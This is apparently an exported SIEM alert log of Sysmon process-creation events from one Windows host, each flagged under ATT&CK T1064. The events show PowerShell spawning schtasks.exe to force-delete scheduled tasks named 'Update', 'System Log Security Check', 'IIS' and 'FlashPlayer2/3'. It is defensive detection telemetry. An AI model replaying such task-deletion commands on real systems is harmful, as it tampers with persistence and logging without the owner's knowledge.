{df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.950"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001023de1900}"",""processId"":""6752"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.290",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.908 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001093dc1900} +ProcessId: 5728 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.911135800Z"",""eventRecordID"":""2230"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.908\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001093dc1900}\r\nProcessId: 5728\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.908"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001093dc1900}"",""processId"":""5728"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.275",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.876 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001003db1900} +ProcessId: 5616 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""System Log Security Check"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.882735200Z"",""eventRecordID"":""2229"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.876\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001003db1900}\r\nProcessId: 5616\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.876"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001003db1900}"",""processId"":""5616"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""System Log Security Check\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.259",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.845 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001074d91900} +ProcessId: 6864 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsLogTasks /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.848329300Z"",""eventRecordID"":""2228"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.845\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001074d91900}\r\nProcessId: 6864\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.845"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001074d91900}"",""processId"":""6864"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsLogTasks /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.243",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.818 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010e2d71900} +ProcessId: 772 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN IIS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.820618600Z"",""eventRecordID"":""2227"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.818\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010e2d71900}\r\nProcessId: 772\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.818"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010e2d71900}"",""processId"":""772"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN IIS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.227",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.794 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001053d61900} +ProcessId: 6028 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.797269700Z"",""eventRecordID"":""2226"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.794\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001053d61900}\r\nProcessId: 6028\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.794"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001053d61900}"",""processId"":""6028"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.212",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.764 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010c3d41900} +ProcessId: 2560 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.768054500Z"",""eventRecordID"":""2225"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.764\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010c3d41900}\r\nProcessId: 2560\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.764"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010c3d41900}"",""processId"":""2560"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating 